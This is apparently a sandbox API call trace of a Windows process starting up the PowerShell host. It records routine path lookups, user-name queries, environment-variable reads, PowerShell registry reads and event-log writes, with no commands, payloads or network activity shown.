	[0778.936] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d370, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.936] SetErrorMode (uMode=0x1) returned 0x1
	[0778.937] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d5d0 | out: lpFileInformation=0x16d5d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0778.937] SetErrorMode (uMode=0x1) returned 0x1
	[0778.937] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d370, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.937] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d220, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.937] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0778.938] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.940] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0778.941] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.941] SetErrorMode (uMode=0x1) returned 0x1
	[0778.941] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0778.941] SetErrorMode (uMode=0x1) returned 0x1
	[0778.941] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.941] SetErrorMode (uMode=0x1) returned 0x1
	[0778.942] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0778.942] SetErrorMode (uMode=0x1) returned 0x1
	[0778.942] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0778.942] SetErrorMode (uMode=0x1) returned 0x1
	[0778.942] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d4a0 | out: lpFileInformation=0x16d4a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0778.942] SetErrorMode (uMode=0x1) returned 0x1
	[0778.943] CoTaskMemAlloc (cb=0x804) returned 0x1b3ee5c0
	[0778.943] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ee5c0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0778.943] CoTaskMemFree (pv=0x1b3ee5c0) 
	[0778.943] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0778.943] GetUserNameW (in: lpBuffer=0x263c80, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0778.946] CoTaskMemFree (pv=0x263c80) 
	[0778.947] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e78830*="FileSystem", lpRawData=0x2e785c0) returned 1
	[0778.951] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0778.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0778.951] CoTaskMemFree (pv=0x2b1df0) 
	[0778.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.956] CoTaskMemAlloc (cb=0x804) returned 0x1b3ee5c0
	[0778.956] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ee5c0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0778.957] CoTaskMemFree (pv=0x1b3ee5c0) 
	[0778.957] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0778.957] GetUserNameW (in: lpBuffer=0x263c80, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0778.957] CoTaskMemFree (pv=0x263c80) 
	[0778.958] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e7e070*="Function", lpRawData=0x2e7de00) returned 1
	[0778.959] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0778.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0778.959] CoTaskMemFree (pv=0x2b1df0) 
	[0779.755] CoTaskMemAlloc (cb=0x804) returned 0x1b3ee5c0
	[0779.755] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ee5c0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0779.756] CoTaskMemFree (pv=0x1b3ee5c0) 
	[0779.756] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0779.756] GetUserNameW (in: lpBuffer=0x263c80, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0779.756] CoTaskMemFree (pv=0x263c80) 
	[0779.756] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea0898*="Registry", lpRawData=0x2ea0628) returned 1
	[0779.994] CoTaskMemAlloc (cb=0x804) returned 0x1b3ee5c0
	[0779.994] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ee5c0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0779.994] CoTaskMemFree (pv=0x1b3ee5c0) 
	[0779.994] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0779.994] GetUserNameW (in: lpBuffer=0x263c80, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0779.995] CoTaskMemFree (pv=0x263c80) 
	[0779.995] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea5cb0*="Variable", lpRawData=0x2ea5a40) returned 1
	[0780.035] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0780.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0780.035] CoTaskMemFree (pv=0x2b1df0) 
	[0780.035] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0780.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0780.035] CoTaskMemFree (pv=0x2b1df0) 
	[0789.711] CoTaskMemAlloc (cb=0x804) returned 0x1b3ee5c0
	[0789.711] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ee5c0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0789.711] CoTaskMemFree (pv=0x1b3ee5c0) 
	[0789.711] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0789.711] GetUserNameW (in: lpBuffer=0x263c80, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0789.711] CoTaskMemFree (pv=0x263c80) 
	[0789.712] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d83ad8*="Certificate", lpRawData=0x2d83868) returned 1
	[0790.134] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0790.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.134] CoTaskMemFree (pv=0x2b1df0) 
	[0790.138] GetLogicalDrives () returned 0x4
	[0790.138] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0790.138] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0790.139] CoTaskMemAlloc (cb=0x20e) returned 0x2ba0c0
	[0790.139] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2ba0c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0790.139] CoTaskMemFree (pv=0x2ba0c0) 
	[0790.141] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0790.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.141] CoTaskMemFree (pv=0x2b1df0) 
	[0790.141] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0790.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.141] CoTaskMemFree (pv=0x2b1df0) 
	[0790.169] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0790.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.169] CoTaskMemFree (pv=0x2b1df0) 
	[0790.170] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0790.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.170] CoTaskMemFree (pv=0x2b1df0) 
	[0790.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.171] SetErrorMode (uMode=0x1) returned 0x1
	[0790.171] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.171] SetErrorMode (uMode=0x1) returned 0x1
	[0790.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.171] SetErrorMode (uMode=0x1) returned 0x1
	[0790.171] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.172] SetErrorMode (uMode=0x1) returned 0x1
	[0790.172] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0790.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.172] CoTaskMemFree (pv=0x2b1df0) 
	[0790.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0791.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0791.154] SetErrorMode (uMode=0x1) returned 0x1
	[0791.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d7b0 | out: lpFileInformation=0x16d7b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0791.154] SetErrorMode (uMode=0x1) returned 0x1
	[0791.164] CoTaskMemAlloc (cb=0x804) returned 0x1b3ee5c0
	[0791.165] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ee5c0, nSize=0x16db18 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16db18) returned 0x1
	[0791.165] CoTaskMemFree (pv=0x1b3ee5c0) 
	[0791.165] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0791.165] GetUserNameW (in: lpBuffer=0x263c80, pcbBuffer=0x16db58 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16db58) returned 1
	[0791.165] CoTaskMemFree (pv=0x263c80) 
	[0791.166] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dcc370*="Available", lpRawData=0x2dcc100) returned 1
	[0791.907] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0791.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.907] CoTaskMemFree (pv=0x2b1df0) 
	[0791.908] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0791.908] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.908] CoTaskMemFree (pv=0x2b1df0) 
	[0791.910] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0791.910] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0791.910] CoTaskMemFree (pv=0x2b1df0) 
	[0791.910] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0791.910] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0791.910] CoTaskMemFree (pv=0x2b1df0) 
	[0791.912] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db38 | out: phkResult=0x16db38*=0x38c) returned 0x0
	[0791.912] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dabc, lpData=0x0, lpcbData=0x16dab8*=0x0 | out: lpType=0x16dabc*=0x1, lpData=0x0, lpcbData=0x16dab8*=0x56) returned 0x0
	[0791.912] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cb820
	[0791.912] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16da8c, lpData=0x1b3cb820, lpcbData=0x16da88*=0x56 | out: lpType=0x16da8c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16da88*=0x56) returned 0x0
	[0791.912] CoTaskMemFree (pv=0x1b3cb820) 
	[0791.912] RegCloseKey (hKey=0x38c) returned 0x0
	[0791.914] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0791.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.914] CoTaskMemFree (pv=0x2b1df0) 
	[0791.951] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0791.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.951] CoTaskMemFree (pv=0x2b1df0) 
	[0792.788] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0792.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.788] CoTaskMemFree (pv=0x2b1df0) 
	[0792.789] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0792.789] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.789] CoTaskMemFree (pv=0x2b1df0) 
	[0792.789] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0792.790] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.790] CoTaskMemFree (pv=0x2b1df0) 
	[0792.791] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0792.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.791] CoTaskMemFree (pv=0x2b1df0) 
	[0792.792] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0792.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.792] CoTaskMemFree (pv=0x2b1df0) 
	[0792.793] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0792.793] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.793] CoTaskMemFree (pv=0x2b1df0) 
	[0792.825] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0792.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.825] CoTaskMemFree (pv=0x2b1df0) 
	[0795.048] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2b2230
	[0795.050] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2b2340
	[0798.308] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0798.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.309] CoTaskMemFree (pv=0x2b2450) 
	[0798.312] CoTaskMemAlloc (cb=0x104) returned 0x2b2450
	[0798.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.312] CoTaskMemFree (pv=0x2b2450) 
	[0799.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.342] VirtualQuery (in: lpAddress=0x16be40, lpBuffer=0x16cd00, dwLength=0x30 | out: lpBuffer=0x16cd00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0799.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.350] VirtualQuery (in: lpAddress=0x16be40, lpBuffer=0x16cd00, dwLength=0x30 | out: lpBuffer=0x16cd00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0799.352] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dc98 | out: phkResult=0x16dc98*=0x2dc) returned 0x0
	[0799.352] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc1c, lpData=0x0, lpcbData=0x16dc18*=0x0 | out: lpType=0x16dc1c*=0x1, lpData=0x0, lpcbData=0x16dc18*=0x56) returned 0x0
	[0799.352] CoTaskMemAlloc (cb=0x5a) returned 0x2d3fd0
	[0799.352] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dbec, lpData=0x2d3fd0, lpcbData=0x16dbe8*=0x56 | out: lpType=0x16dbec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dbe8*=0x56) returned 0x0
	[0799.352] CoTaskMemFree (pv=0x2d3fd0) 
	[0799.352] RegCloseKey (hKey=0x2dc) returned 0x0
	[0799.352] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dc98 | out: phkResult=0x16dc98*=0x2dc) returned 0x0
	[0799.352] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dc1c, lpData=0x0, lpcbData=0x16dc18*=0x0 | out: lpType=0x16dc1c*=0x1, lpData=0x0, lpcbData=0x16dc18*=0x56) returned 0x0
	[0799.353] CoTaskMemAlloc (cb=0x5a) returned 0x2d3fd0
	[0799.353] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dbec, lpData=0x2d3fd0, lpcbData=0x16dbe8*=0x56 | out: lpType=0x16dbec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dbe8*=0x56) returned 0x0
	[0799.353] CoTaskMemFree (pv=0x2d3fd0) 
	[0799.353] RegCloseKey (hKey=0x2dc) returned 0x0
	[0799.353] CoTaskMemAlloc (cb=0x20c) returned 0x1b3c0970
	[0799.353] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b3c0970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0799.354] CoTaskMemFree (pv=0x1b3c0970) 
	[0799.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0799.354] CoTaskMemAlloc (cb=0x20c) returned 0x1b3c0970
